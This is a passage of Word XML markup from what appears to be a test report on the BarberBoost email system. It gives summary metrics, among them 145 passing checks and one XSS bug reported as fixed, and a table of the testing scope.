        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2944954D"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A thorough automated test suite was written and executed against the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BarberBoost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> email system. The suite covers all </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8 email templates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7 structural checks per template</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>template-specific content assertions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>edge-case rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>live delivery via the Resend API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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80"/>
        <w:gridCol w:w="3807"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="1CB8F5AB"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4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="47207CF2"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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="44661ED0"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7B6E388A" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7EB56E5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Total checks run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="115816C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145</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="7E61EA9C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E7BF01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Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03B6297A" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>145</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="4DE9EA04" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0D7252D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Failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="75E0D8CB" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="6642E7C5" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21C3887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 emails delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65576ECF" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>8 / 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="53AF877C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2FC251F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Bugs found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4CCF9C64" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1 (XSS — fixed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="4DE79CD6" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FED941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Outstanding issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2857DDE0" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1 (local dev env config — non-blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49789C00" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The email system is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ready for production</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>development</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> branch. One security bug was found and fixed during testing. All 8 email types delivered successfully to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>webxcelld@gmail.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Resend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3305992C" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="0A3B954E">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D1F968" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc228978582"/>
      <w:bookmarkStart w:id="5" w:name="scope"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="2A5A157A" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="in-scope"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.1 In Scope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6"/>
        <w:gridCol w:w="3096"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="0F04C25F"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="5CF6A530"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="7D2C014B"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Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="1C3A98CD"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="040A7CE7" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="44A17E7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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="027C9D4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templates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="01AA79A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All 8 templates in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/lib/email/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>templates.ts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="6669F181" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="216663F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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="701683F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Template structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2AD271F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DOCTYPE, branding, HTML tag balance, plain-text fallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="7CD21F59" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0962E29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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="319B96F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Template content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="38FA7E7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lines, key copy, CTAs, recipient-specific data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="4E4A860B" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2409992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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1F458F3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 cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4A94ECB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Null optional fields, singular/plural copy, null </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ownerName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="79762C56" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1C05321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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0E60150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Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="17141BA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injection / XSS in user-supplied fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="26FF7A94" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="458FC87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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="380971C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 delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D5F2AF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Actual send to </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>webxcelld@gmail.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> via Resend API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="6BE5505D" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="320E527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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6A7F4D4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Branch comparison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="30C40AF6"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main</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (production) vs </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>development</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (local) diff</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5748E72F" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
